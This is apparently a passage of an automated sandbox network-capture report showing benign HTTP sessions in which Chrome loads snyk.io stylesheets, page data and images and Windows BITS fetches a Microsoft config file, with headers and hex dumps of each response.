                                                                                                                                                                                                                                                                                                              Data Ascii: 00011822policies/website-terms-of-use">Website Terms of Use</a></li><li><a href="https://preferences.snyk.io/dont_sell">For California residents: Do not sell my personal information</a></li></ul></div></div></footer></div></div><script id="__NEXT_DATA__
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC16384INData Raw: 76 69 73 69 6f 6e 22 3a 34 36 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 43 6f 6d 70 61 6e 79 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 63 6f 6d 70 61 6e 79 4e 61 6d 65 22 3a 22 54 77 69 6c 69 6f 22 2c 22 6c 6f 67 6f 48 6f 72 69 7a 6f 6e 74 61 6c 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 37 34 35 39 38 36 33 32 2f 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 6c 6f 67 6f 2d 74 77 69 6c 69 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: vision":46,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentCompany"}},"locale":"en-US"},"fields":{"companyName":"Twilio","logoHorizontal":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1674598632/customer-logos/logo-twilio
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC3259INData Raw: 6f 76 65 72 79 2c 20 74 61 69 6c 6f 72 65 64 20 73 65 63 75 72 69 74 79 20 63 6f 6e 74 72 6f 6c 73 2c 20 61 6e 64 20 72 69 73 6b 2d 62 61 73 65 64 20 70 72 69 6f 72 69 74 69 7a 61 74 69 6f 6e 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 63 74 69 6f 6e 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61
                                                                                                                                                                                                                                                                                                              Data Ascii: overy, tailored security controls, and risk-based prioritization.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"actions":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43a


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              1192.168.2.549715184.28.90.27443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:54 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                              Server: ECAcc (lpl/EF45)
                                                                                                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=248207
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:55 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-CID: 2


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              2192.168.2.54971923.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC523OUTGET /_next/static/css/26b648d8446363b8.css HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="26b648d8446363b8.css"
                                                                                                                                                                                                                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"f1ebc1a3131766827823cfaf6ae111b0"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/css/26b648d8446363b8.css
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::d7dg7-1729257049037-e82e5ccc75e1
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:55 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799335.1f5fedd
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC15639INData Raw: 30 30 30 30 43 30 30 30 0d 0a 40 69 6d 70 6f 72 74 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 42 69 67 2b 53 68 6f 75 6c 64 65 72 73 2b 44 69 73 70 6c 61 79 3a 77 67 68 74 40 31 30 30 2e 2e 39 30 30 26 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 69 74 61 6c 2c 77 67 68 74 40 30 2c 34 30 30 3b 30 2c 36 30 30 3b 30 2c 37 30 30 3b 31 2c 34 30 30 3b 31 2c 36 30 30 3b 31 2c 37 30 30 26 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 4d 6f 6e 6f 3a 69 74 61 6c 2c 77 67 68 74 40 30 2c 31 30 30 2e 2e 37 30 30 3b 31 2c 31 30 30 2e 2e 37 30 30 26 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 69 74 61 6c 2c 77 67 68 74 40 30 2c 34 30 30 3b 30 2c 35 30 30 3b 30 2c 37 30 30 3b 31 2c 34 30 30 3b
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000@import"https://fonts.googleapis.com/css2?family=Big+Shoulders+Display:wght@100..900&family=Poppins:ital,wght@0,400;0,600;0,700;1,400;1,600;1,700&family=Roboto+Mono:ital,wght@0,100..700;1,100..700&family=Roboto:ital,wght@0,400;0,500;0,700;1,400;
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC15904INData Raw: 74 6c 69 67 68 74 2d 73 65 63 6f 6e 64 61 72 79 2c 5b 64 61 74 61 2d 70 61 67 65 2d 74 68 65 6d 65 3d 64 65 66 61 75 6c 74 5d 20 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 73 70 6f 74 6c 69 67 68 74 2d 73 65 63 6f 6e 64 61 72 79 2c 5b 64 61 74 61 2d 70 61 67 65 2d 74 68 65 6d 65 3d 64 65 66 61 75 6c 74 5d 20 2e 73 70 6f 74 6c 69 67 68 74 2d 73 65 63 6f 6e 64 61 72 79 2e 64 61 72 6b 2d 6d 6f 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 34 30 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 32 30 2c 32 32 35 2c 2e 35 29 2c 72 67 62 61 28 32 34 39 2c 31 32 32 2c 31 35 33 2c 2e 35 29 29 7d 5b 64 61 74 61 2d 70 61 67 65 2d 74 68 65 6d 65 3d 73 65 63 6f 6e 64 61 72 79 5d 20 2e 73 70 6f 74 6c 69 67 68 74 2d 73 65 63 6f 6e 64 61
                                                                                                                                                                                                                                                                                                              Data Ascii: tlight-secondary,[data-page-theme=default] .dark-mode .spotlight-secondary,[data-page-theme=default] .spotlight-secondary.dark-mode{background:linear-gradient(140deg,rgba(255,120,225,.5),rgba(249,122,153,.5))}[data-page-theme=secondary] .spotlight-seconda
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC16384INData Raw: 6c 2d 35 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 68 6f 76 65 72 5c 3a 74 78 74 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 35 3a 68 6f 76 65 72 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 74 78 74 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 35 2c 2e 66 6f 63 75 73 5c 3a 74 78 74 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 35 3a 66 6f 63 75 73 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 67 72 6f 75 70 3a 66 6f 63 75 73 2d 77 69 74 68 69 6e 20 2e 67 72 6f 75 70 2d 66 6f 63 75 73 2d 77 69 74 68 69 6e 5c 3a 74 78 74 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 35 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 67 72 6f 75 70 3a 68 6f 76 65 72 20 2e 67 72 6f 75 70 2d 68 6f 76 65 72 5c 3a 74 78 74 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 35 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 68 6f 76 65 72 5c 3a 74 78 74 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: l-5,.dark-mode .hover\:txt-action-opal-5:hover,.dark-mode .txt-action-opal-5,.focus\:txt-action-opal-5:focus.dark-mode,.group:focus-within .group-focus-within\:txt-action-opal-5.dark-mode,.group:hover .group-hover\:txt-action-opal-5.dark-mode,.hover\:txt-
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC1237INData Raw: 6d 6f 64 65 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 36 32 2c 31 36 32 2c 32 35 35 2c 2e 36 29 7d 2e 61 63 74 69 76 65 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 30 36 20 61 3a 61 63 74 69 76 65 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 61 63 74 69 76 65 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 30 36 20 61 3a 61 63 74 69 76 65 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 66 6f 63 75 73 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 30 36 20 61 3a 66 6f 63 75 73 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 67 72 6f 75 70 3a 66 6f 63 75 73 2d 77 69 74 68 69 6e 20 2e 67 72 6f 75 70 2d 66 6f 63 75 73 2d 77 69 74 68 69 6e 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 30 36 20 61 2c 2e 64 61 72 6b 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: mode{color:rgba(62,162,255,.6)}.active\:link-action-opal-06 a:active.dark-mode,.dark-mode .active\:link-action-opal-06 a:active,.dark-mode .focus\:link-action-opal-06 a:focus,.dark-mode .group:focus-within .group-focus-within\:link-action-opal-06 a,.dark-
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 37 20 61 2e 64 61 72 6b 2d 6d 6f 64 65 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 36 32 2c 31 36 32 2c 32 35 35 2c 2e 37 29 7d 2e 61 63 74 69 76 65 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 30 37 20 61 3a 61 63 74 69 76 65 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 61 63 74 69 76 65 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 30 37 20 61 3a 61 63 74 69 76 65 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 66 6f 63 75 73 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 30 37 20 61 3a 66 6f 63 75 73 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 67 72 6f 75 70 3a 66 6f 63 75 73 2d 77 69 74 68 69 6e 20 2e
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000.dark-mode,.link-action-opal-7 a.dark-mode{color:rgba(62,162,255,.7)}.active\:link-action-opal-07 a:active.dark-mode,.dark-mode .active\:link-action-opal-07 a:active,.dark-mode .focus\:link-action-opal-07 a:focus,.dark-mode .group:focus-within .
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC12INData Raw: 69 74 68 69 6e 5c 3a 74 78 74 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ithin\:txt
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 2d 61 63 74 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 30 36 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 67 72 6f 75 70 3a 68 6f 76 65 72 20 2e 67 72 6f 75 70 2d 68 6f 76 65 72 5c 3a 74 78 74 2d 61 63 74 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 30 36 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 68 6f 76 65 72 5c 3a 74 78 74 2d 61 63 74 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 30 36 3a 68 6f 76 65 72 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 74 78 74 2d 61 63 74 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 30 36 2c 2e 66 6f 63 75 73 5c 3a 74 78 74 2d 61 63 74 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 30 36 3a 66 6f 63 75 73 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 67 72 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000-action-secondary-opal-06,.dark-mode .group:hover .group-hover\:txt-action-secondary-opal-06,.dark-mode .hover\:txt-action-secondary-opal-06:hover,.dark-mode .txt-action-secondary-opal-06,.focus\:txt-action-secondary-opal-06:focus.dark-mode,.gro
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC12INData Raw: 5c 3a 6c 69 6e 6b 2d 61 63 74 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: \:link-act
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC16384INData Raw: 30 30 30 31 38 30 30 30 0d 0a 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 36 20 61 3a 61 63 74 69 76 65 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 61 63 74 69 76 65 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 36 20 61 3a 61 63 74 69 76 65 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 66 6f 63 75 73 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 36 20 61 3a 66 6f 63 75 73 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 67 72 6f 75 70 3a 66 6f 63 75 73 2d 77 69 74 68 69 6e 20 2e 67 72 6f 75 70 2d 66 6f 63 75 73 2d 77 69 74 68 69 6e 5c 3a 6c 69 6e 6b 2d 61 63 74 69 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 6f 70 61 6c 2d 36 20 61 2c 2e 64 61 72 6b 2d 6d 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00018000ion-secondary-opal-6 a:active.dark-mode,.dark-mode .active\:link-action-secondary-opal-6 a:active,.dark-mode .focus\:link-action-secondary-opal-6 a:focus,.dark-mode .group:focus-within .group-focus-within\:link-action-secondary-opal-6 a,.dark-mo
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC16384INData Raw: 62 61 28 32 30 2c 39 33 2c 32 33 35 2c 2e 36 29 7d 2e 62 67 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 36 2e 64 61 72 6b 2d 6d 6f 64 65 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 62 67 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 36 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 66 6f 63 75 73 5c 3a 62 67 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 36 3a 66 6f 63 75 73 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 67 72 6f 75 70 3a 66 6f 63 75 73 2d 77 69 74 68 69 6e 20 2e 67 72 6f 75 70 2d 66 6f 63 75 73 2d 77 69 74 68 69 6e 5c 3a 62 67 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 36 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 67 72 6f 75 70 3a 68 6f 76 65 72 20 2e 67 72 6f 75 70 2d 68 6f 76 65 72 5c 3a 62 67 2d 61 63 74 69 6f 6e 2d 6f 70 61 6c 2d 36 2c 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 68 6f 76
                                                                                                                                                                                                                                                                                                              Data Ascii: ba(20,93,235,.6)}.bg-action-opal-6.dark-mode,.dark-mode .bg-action-opal-6,.dark-mode .focus\:bg-action-opal-6:focus,.dark-mode .group:focus-within .group-focus-within\:bg-action-opal-6,.dark-mode .group:hover .group-hover\:bg-action-opal-6,.dark-mode .hov


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              3192.168.2.54971623.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC659OUTGET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&w=960&q=75 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="feature-snyk-snowflake.webp"
                                                                                                                                                                                                                                                                                                              Content-Length: 9816
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'none'; frame-src 'none'; sandbox;
                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 04 Jun 2024 00:44:27 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::mh789-1729799335785-b3a0d77468b7
                                                                                                                                                                                                                                                                                                              X-Vercel-Imgsrc: d99801196f2474998946528806e55977
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:55 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799335.1f5feda
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC2372INData Raw: 52 49 46 46 50 26 00 00 57 45 42 50 56 50 38 20 44 26 00 00 10 0a 01 9d 01 2a c0 03 f6 01 3e 91 48 9f 4c a5 a4 26 a8 21 32 78 d1 00 12 09 67 6e e3 d5 48 2a d2 f7 ae 90 df b3 f3 e3 4d 7d 5d 1b 7f ab a6 a1 b8 db 92 fc c5 7f d1 88 86 5c e0 cb f3 d8 85 f7 5f ce 79 f7 3f e9 fa bb fe d3 ba f7 cc 87 9b 8f a6 6f ee 7e 91 9d 51 9f e0 3d 51 3a 63 ff b6 ff e5 ca a2 c5 4b 16 fe 34 cf 37 f6 3d f1 f0 02 76 9d a1 77 f7 fe 27 eb 8f aa 7f 6a 3d 80 38 39 a8 11 e5 0b ff 0f 96 97 e9 86 56 9c 49 96 4c 3c 02 3d fb 46 f0 4a 1a 94 c2 50 33 9c 22 fc df 17 df 0e d4 ee 42 35 ca 06 74 7b ba a7 22 5c 66 56 6f f6 b3 ab fb 4e 42 56 b3 a5 01 70 ae 40 a8 1d 0b 19 67 fc fe 94 13 b8 39 3b 93 f8 90 ab 66 59 ff 1a 9f 47 0b 0c 1c 47 53 70 ca 1e e8 63 d0 b1 87 e4 34 0c e3 33 5d 19 d7 ff 50 47
                                                                                                                                                                                                                                                                                                              Data Ascii: RIFFP&WEBPVP8 D&*>HL&!2xgnH*M}]\_y?o~Q=Q:cK47=vw'j=89VIL<=FJP3"B5t{"\fVoNBVp@g9;fYGGSpc43]PG
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC7444INData Raw: d6 e1 c0 a8 ae cc d1 f5 ff d9 b2 92 7a 3d fc 3f 5d 21 94 7a 0c 7e 80 64 82 f7 af 7b 9f 5b 53 31 cd 97 01 d4 b4 bd d3 fe 48 91 e4 90 8b b7 7c 1d 70 d5 04 87 a2 c6 a2 5a fd 12 19 31 f8 0a fb e7 d0 1d 70 fd e7 7c be de 97 b7 98 f4 e6 a6 67 50 7f ef 27 31 75 00 6b 47 6f e9 d7 d5 d0 ad b2 8d 1d bf c2 78 bd cb 19 b3 e8 4b 4b e6 9f 1d d9 40 1c b0 d1 f3 da b0 07 20 ca d2 ad 0a 23 e0 73 cc c5 2c 77 32 44 bd e2 b0 06 b9 b8 60 1a e5 1e 3a d6 62 e6 c9 09 2e 05 a6 46 d1 bf 22 ae d1 98 17 b7 99 13 df e1 e0 03 6e 80 3b f2 b2 f2 92 fa 5f a5 00 3d 64 12 2e 8a 1e 46 97 01 b7 e3 a1 6d 5f 48 24 fe f1 8e 37 2d 9d ce 08 b4 d5 54 5b 3e 2f 39 96 90 4f 88 66 56 d6 cf e8 60 f4 1e 36 e3 c8 cd ce 92 6a cc fd 6a 9a 94 b4 81 2a 00 ea 88 6c e6 7f 64 e1 be 3e cf 2e 53 0d 56 3b 81 24 24
                                                                                                                                                                                                                                                                                                              Data Ascii: z=?]!z~d{[S1H|pZ1p|gP'1ukGoxKK@ #s,w2D`:b.F"n;_=d.Fm_H$7-T[>/9OfV`6jj*ld>.SV;$$


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              4192.168.2.54971723.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC654OUTGET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&w=960&q=75 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:55 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="feature-code-rise.webp"
                                                                                                                                                                                                                                                                                                              Content-Length: 11678
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'none'; frame-src 'none'; sandbox;
